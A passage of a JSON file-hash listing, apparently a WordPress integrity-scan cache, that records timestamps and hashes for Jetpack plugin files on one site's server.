\/sitemap.php\":{\"d\":1544704145,\"h\":\"e8abd2345a9eb1e427b0275e307fbd38\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/ted.php\":{\"d\":1544704145,\"h\":\"3bcbc555b6e72e69f0ee2f2e2c46fb20\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/cartodb.php\":{\"d\":1544704145,\"h\":\"1f0b07363da090d54f278639bc2ff39d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/googlevideo.php\":{\"d\":1544704145,\"h\":\"37db1deaa167024606adaadedbfabf60\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/pinterest.php\":{\"d\":1544704145,\"h\":\"ac0308755dd0fc5c2f575099809ac478\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/archiveorg-book.php\":{\"d\":1544704145,\"h\":\"4a6bdfd08a18766c6f3a063c12cfd760\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/lytro.php\":{\"d\":1544704145,\"h\":\"6c83382577caeaad3b98dd48c6ae6aa4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/presentations.php\":{\"d\":1544704145,\"h\":\"f433844e7c82c9c6382e5af904b034a1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/googleplus.php\":{\"d\":1544704145,\"h\":\"0b8128ba6f577dca03cf952d54d058d3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/twitchtv.php\":{\"d\":1544704145,\"h\":\"d178b4fd0cac30fce8a33939d761b3a9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/site-icon\\/site-icon-functions.php\":{\"d\":1544704145,\"h\":\"33d32fcc4823a6ed789b0ee34c30ab26\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/post-by-email\\/post-by-email.js\":{\"d\":1544704145,\"h\":\"84a5137a01e3a048f0a55935ad6fa0ea\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/post-by-email\\/post-by-email-rtl.min.css\":{\"d\":1544704145,\"h\":\"9c3d64dade4897219971f39400608ca5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/post-by-email\\/post-by-email-rtl.css\":{\"d\":1544704145,\"h\":\"b1902fb7a434a426d631a877037484bc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/post-by-email\\/post-by-email.css\":{\"d\":1544704145,\"h\":\"0095e60166ef696644dca4273175bc46\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/post-by-email\\/post-by-email.min.css\":{\"d\":1544704145,\"h\":\"9d1c6a9d20bb38290c7afbcb6ad664d6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/manage\\/confirm-admin.php\":{\"d\":1544704145,\"h\":\"af38c5a795ecbc7455b0078fb9d388ba\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/manage\\/activate-admin.php\":{\"d\":1544704145,\"h\":\"2ccdf467e0fde772901d67fad1ede1ce\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/seo-tools\\/jetpack-seo-titles.php\":{\"d\":1544704145,\"h\":\"0e2b6c14f275a9ea794cecbd6ca961f4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/seo-tools\\/jetpack-seo-posts.php\":{\"d\":1544704145,\"h\":\"3a146768ce895862f49e9b35f70fdcef\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/seo-tools\\/jetpack-seo.php\":{\"d\":1544704145,\"h\":\"a684d48844b77b2e4e716e94c1670318\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/seo-tools\\/jetpack-seo-utils.php\":{\"d\":1544704145,\"h\":\"07c8aa062e2c90aa1a29742a60240bc2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/carousel.php\":{\"d\":1544704139,\"h\":\"713ad4ebfa60f594db80885311ee823b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/protect.php\":{\"d\":1544704139,\"h\":\"5e3742febee4e35d765fcb8b19f02ae7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/manage.php\":{\"d\":1544704139,\"h\":\"f0cc0de99dab9aaae5a4ab720e1c06b8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/tiled-gallery.php\":{\"d\":1544704139,\"h\":\"b2f282a7d350280900519cd1949ac388\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/related-posts.php\":{\"d\":1544704139,\"h\":\"6371b343eb963defe5f12f81146850f4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/videopress.php\":{\"d\":1544704139,\"h\":\"1da93e48256c87518536fe2772be9916\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/tonesque.php\":{\"d\":1544704139,\"h\":\"8e4010b5bea79fce1cf9b57d822ef350\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes.php\":{\"d\":1544704139,\"h\":\"9e871e4693d6d22a8d300bf2944afe70\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/gravatar-hovercards.php\":{\"d\":1544704139,\"h\":\"e3f0690090ea3f7c257e8afca012914d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets.php\":{\"d\":1544704139,\"h\":\"5bcec8cc77a79955f0349738f527ed5d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/post-by-email.php\":{\"d\":1544704139,\"h\":\"be81f8169b5a7ed603fa965c9617056e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/gplus-authorship.php\":{\"d\":1544704139,\"h\":\"8e4010b5bea79fce1cf9b57d822ef350\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/contact-form.php\":{\"d\":1544704139,\"h\":\"3943a6a6966b485af1e91e143d27514c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/monitor.php\":{\"d\":1544704139,\"h\":\"8e0158692488fe2e01daeb1fe43ec3af\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/random-redirect.php\":{\"d\":1544704139,\"h\":\"8e4010b5bea79fce1cf9b57d822ef350\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/verification-tools.php\":{\"d\":1544704139,\"h\":\"fa93bb0f033b2656721710681aa7d5b9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/minileven.php\":{\"d\":1544704139,\"h\":\"36b9cabff0f5caaeb0090f9e090bbb4a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/social-links.php\":{\"d\":1544704139,\"h\":\"8e4010b5bea79fce1cf9b57d822ef350\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/module-extras.php\":{\"d\":1544704139,\"h\":\"18c44ed5f0ead1372ea58fccc42141dd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortlinks.php\":{\"d\":1544704143,\"h\":\"751d9f07b39ad8c77c61c225f5516836\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/markdown.php\":{\"d\":1544704143,\"h\":\"42f42a8b9857d9f985ff4d958820c578\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/lazy-images.php\":{\"d\":1544704143,\"h\":\"027c3874839b7ed186228e9fcca413fc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/stats.php\":{\"d\":1544704143,\"h\":\"882a2f81e14659e03bc33daaeeed4b10\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/theme-tools.php\":{\"d\":1544704143,\"h\":\"c008bc7c8a42953f1073959f3fe11238\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/wpgroho.js\":{\"d\":1544704143,\"h\":\"b900f865a0d6f581b8e93f8c6311550f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/module-info.php\":{\"d\":1544704143,\"h\":\"b66a5269bb5b3cc5094783da9f586fbd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/search.php\":{\"d\":1544704143,\"h\":\"6adfa960435b1d12a3deaa6729689ef0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/comments.php\":{\"d\":1544704143,\"h\":\"c5bf6c2cd7fdcfbafa88da6d6ce3f716\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/photon-cdn.php\":{\"d\":1544704143,\"h\":\"6681e02d57ee29b4df1322f38bd0fa4b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-content-types.php\":{\"d\":1544704143,\"h\":\"4f606f68759091ccdf7110ad06274425\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/latex.php\":{\"d\":1544704143,\"h\":\"74c26c3e8f2d666f77ef7bd1fed08d76\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/notes.php\":{\"d\":1544704143,\"h\":\"831b04a2a7ce8a9f7657e49d3ee426b2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/photon.php\":{\"d\":1544704143,\"h\":\"0963b34342e14ea8d24ba908a666f03d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/site-icon.php\":{\"d\":1544704143,\"h\":\"71eae4b0ff5afcf479e63c56266c9653\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/mobile-push.php\":{\"d\":1544704143,\"h\":\"d1c065d58587cd4063ae634bd728dfbe\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/wpcc.php\":{\"d\":1544704143,\"h\":\"8e4010b5bea79fce1cf9b57d822ef350\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/seo-tools.php\":{\"d\":1544704143,\"h\":\"a2b763fc803aacd4ff5eacf05b39d508\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/pwa.php\":{\"d\":1544704145,\"h\":\"b8b75b860a21154f38c078ace374eef0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/omnisearch.php\":{\"d\":1544704145,\"h\":\"8e4010b5bea79fce1cf9b57d822ef350\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/infinite-scroll.php\":{\"d\":1544704145,\"h\":\"b4012833ed10bba47204396554aac380\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/sitemaps.php\":{\"d\":1544704145,\"h\":\"ae2079e66c407d306af5bad3ed6765af\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/holiday-snow.php\":{\"d\":1544704145,\"h\":\"aaceb7c870136cf731a68c66b0c3a3b5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-css.php\":{\"d\":1544704145,\"h\":\"bf670825ae5c08497a6d1a42b382ff7b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/after-the-deadline.php\":{\"d\":1544704145,\"h\":\"41f88ac2c46543eebb0b3f62341bbc8f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/vaultpress.php\":{\"d\":1544704145,\"h\":\"2bce7b3c7196302e069b644336091f27\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/geo-location.php\":{\"d\":1544704145,\"h\":\"4a47c5ecdeb32a3ae2e912b04a2c032f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/blocks.php\":{\"d\":1544704145,\"h\":\"f0831e39e240695660f8fbca5510db95\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/google-analytics.php\":{\"d\":1544704145,\"h\":\"0590d1bd4bea6c3f898ba749b911544e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/module-headings.php\":{\"d\":1544704145,\"h\":\"e726230e95e0310e00e3c99def8e15c1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/wordads.php\":{\"d\":1544704145,\"h\":\"22cdf428b6ab5650d6049f97331f4818\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/sso.php\":{\"d\":1544704145,\"h\":\"5c919f88a6308e2d4a9d844c4dc48cad\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/json-api.php\":{\"d\":1544704145,\"h\":\"c0fa518fa8fe46390d2348b82d4c56c6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/debug.php\":{\"d\":1544704145,\"h\":\"8e4010b5bea79fce1cf9b57d822ef350\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widget-visibility.php\":{\"d\":1544704145,\"h\":\"e0956b34879bceed07b1afe648a554e2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/sharedaddy.php\":{\"d\":1544704145,\"h\":\"2e8dbc90b33a95f1a7ac1c2b4060c055\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/subscriptions.php\":{\"d\":1544704145,\"h\":\"84ea4857a497dddaa23a1432e55c9886\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/enhanced-distribution.php\":{\"d\":1544704145,\"h\":\"00bc26c4d83c4852499f771f30df3d1f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/likes.php\":{\"d\":1544704145,\"h\":\"1eb1979e76b9df75533301e4e0b5dd2b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/masterbar.php\":{\"d\":1544704145,\"h\":\"543ff11fd2666b1aa1b9c33b29bef4cf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/publicize.php\":{\"d\":1544704145,\"h\":\"d6017dc21732708ae613f951058f0fb5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/comment-likes.php\":{\"d\":1544704145,\"h\":\"b44e7b6645405a5936f92e3319cde782\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/bin\\/partner-cancel.sh\":{\"d\":1544704145,\"h\":\"0fa982bfef5f0eea25d9594e52ba3213\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/bin\\/partner-provision.sh\":{\"d\":1544704145,\"h\":\"b0aae33c35a9d36c4769fda00d67388d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/bin\\/build-asset-cdn-json.php\":{\"d\":1544704145,\"h\":\"3925cc774822321618c5386c70a6dbd2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/views\\/admin\\/network-settings.php\":{\"d\":1544704145,\"h\":\"33230b9b05f176c6d70a8779bc0a60d7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/views\\/admin\\/network-admin-header.php\":{\"d\":1544704145,\"h\":\"50319e18f51f8e6806f49b65f3bb326a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/views\\/admin\\/network-admin-footer.php\":{\"d\":1544704145,\"h\":\"b55608779b3183907007ccba0bc1c6fe\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/views\\/admin\\/network-admin-alert.php\":{\"d\":1544704145,\"h\":\"b55608779b3183907007ccba0bc1c6fe\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/views\\/admin\\/network-activated-notice.php\":{\"d\":1544704145,\"h\":\"cebb0c29c3da9a4b7d966ba95cb377e3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/views\\/admin\\/must-connect-main-blog.php\":{\"d\":1544704145,\"h\":\"661d947a193b3a98e11d8e610ec7c10e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-translations-modify-endpoint.php\":{\"d\":1544704145,\"h\":\"0c1abb13730788f2e26394d7f22b5d2f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-get-term-backup-endpoint.php\":{\"d\":1544704145,\"h\":\"9de6a9dabc1d42f8889c2e2874aceca8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-plugins-list-endpoint.php\":{\"d\":1544704145,\"h\":\"36122f915a96a6d4102cf95c07b57f94\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-themes-active-endpoint.php\":{\"d\":1544704145,\"h\":\"0380a824d04ac5f873d50e2d745bd690\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-plugins-get-endpoint.php\":{\"d\":1544704145,\"h\":\"e471e05f167a04382cf877802c73fd9a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-themes-list-endpoint.php\":{\"d\":1544704145,\"h\":\"25d0bf55db7378a28f6fd061dbe1a845\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-get-option-backup-endpoint.php\":{\"d\":1544704145,\"h\":\"14fafb2db68e8811dd0ae17b93d32abb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-modules-modify-endpoint.php\":{\"d\":1544704145,\"h\":\"19f57e52babc040ae6cdecc996a7295d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-check-capabilities-endpoint.php\":{\"d\":1544704145,\"h\":\"978e8329887c572b7abdacc134843fc3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-core-modify-endpoint.php\":{\"d\":1544704145,\"h\":\"6efedb11cfa39121abbb7ce7220839a6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-updates-status-endpoint.php\":{\"d\":1544704145,\"h\":\"176a30329574f95414fe3171f99ece4b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-get-comment-backup-endpoint.php\":{\"d\":1544704145,\"h\":\"c5848a9168748f490e0a38e860c69e95\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-plugins-modify-endpoint.php\":{\"d\":1544704145,\"h\":\"5ab7c773943645c1dc05c3ed5fa7eec9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-get-post-backup-endpoint.php\":{\"d\":1544704145,\"h\":\"a5ccdf2f2412c09e9057b744e8ad1890\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-modules-endpoint.php\":{\"d\":1544704145,\"h\":\"74390954355e9b0d50c8c102c4025247\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-modules-get-endpoint.php\":{\"d\":1544704145,\"h\":\"e1c70e8b57d665ce7c7e48f62a9d49ca\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-sync-endpoint.php\":{\"d\":1544704145,\"h\":\"2d3e58c6c30bbde9b0f1688f4883922e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-themes-new-endpoint.php\":{\"d\":1544704145,\"h\":\"5eb0038fc8f4de0813a5d36e9cd743e4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.wpcom-json-api-get-option-endpoint.php\":{\"d\":1544704145,\"h\":\"cfe00d099d5746f61fc1af4102387506\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-plugins-endpoint.php\":{\"d\":1544704145,\"h\":\"b923bfb92b6ee9f2d3137eeee081cf4d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-log-endpoint.php\":{\"d\":1544704145,\"h\":\"7f6ad24ab8e25922ddd5e4e0cfe0a74d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-core-endpoint.php\":{\"d\":1544704145,\"h\":\"86fd7b49d355fb274892dbd2a6530b6a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-user-connect-endpoint.php\":{\"d\":1544704145,\"h\":\"6abcb3984db5f5a81d43a789fbe8cb83\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-plugins-delete-endpoint.php\":{\"d\":1544704145,\"h\":\"ca3e8eaa18af1b801d8797a5c9238a6d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-modules-list-endpoint.php\":{\"d\":1544704145,\"h\":\"3fb406bc70cfe330e70cb1b620e41e7a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-translations-endpoint.php\":{\"d\":1544704145,\"h\":\"87ea7757352075bcba747fcca7933c1e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-themes-install-endpoint.php\":{\"d\":1544704145,\"h\":\"cd6725c3c4ed9edf30a1283084ee69b7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-get-database-object-backup-endpoint.php\":{\"d\":1544704145,\"h\":\"cf8c970b34bbd63b99eaa3dc1662e06c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-cron-endpoint.php\":{\"d\":1544704145,\"h\":\"0388137407810e9bd1d9fbd7901c95ad\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-plugins-new-endpoint.php\":{\"d\":1544704145,\"h\":\"4ba89ee911a12fb44798613ee1366caf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-themes-delete-endpoint.php\":{\"d\":1544704145,\"h\":\"435599ed712bb98653edbb00a75a042a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-plugins-install-endpoint.php\":{\"d\":1544704145,\"h\":\"ab9059c163919a79c6c11aadff4a549b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.wpcom-json-api-update-option-endpoint.php\":{\"d\":1544704145,\"h\":\"e5142b781c268c0597659f11771fcc71\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-get-user-backup-endpoint.php\":{\"d\":1544704145,\"h\":\"060515416c06c2c185db7adbc51ef342\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-endpoint.php\":{\"d\":1544704145,\"h\":\"38e1b61b40f7632c6726aa7f69de480f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-plugins-modify-v1-2-endpoint.